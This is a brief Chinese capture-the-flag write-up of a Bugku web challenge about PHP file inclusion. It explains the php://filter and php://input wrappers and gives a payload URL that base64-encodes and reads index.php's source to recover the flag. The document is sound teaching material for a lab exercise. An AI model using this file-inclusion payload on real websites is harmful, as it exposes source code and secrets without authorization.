bugku-writeup-web-文件包含

 bugku-web14解题思路记录。

题目:click me? no

bugku-writeup-web-文件包含_第1张图片

01—找线索

bugku-writeup-web-文件包含_第2张图片

点击click me? no显示index.php,URL为http://114.67.246.176:19952/index.php?file=show.php,可能存在文件包含漏洞。

CTF中经常使用的是php://filterphp://input

php://filter用于读取源码

php://input用于执行php代码

php://filter/read=convert.base64-encode/resource=[文件名]

用于读取文件源码(针对php文件需要base64编码)

其中convert.base64-encode & convert.base64-decode

等同于base64_encode()base64_decode(),base64编码&解码 

resource=<要过滤的数据流>

2—构造payload


构造payload:

http://114.67.246.176:19952/index.php?file=php://filter/read=convert.base64-encode/resource=index.php

得到base64编码之后的源码:

解码得到flag。

bugku-writeup-web-文件包含_第3张图片

php很重要!

 

你可能感兴趣的:(信息安全,安全,web)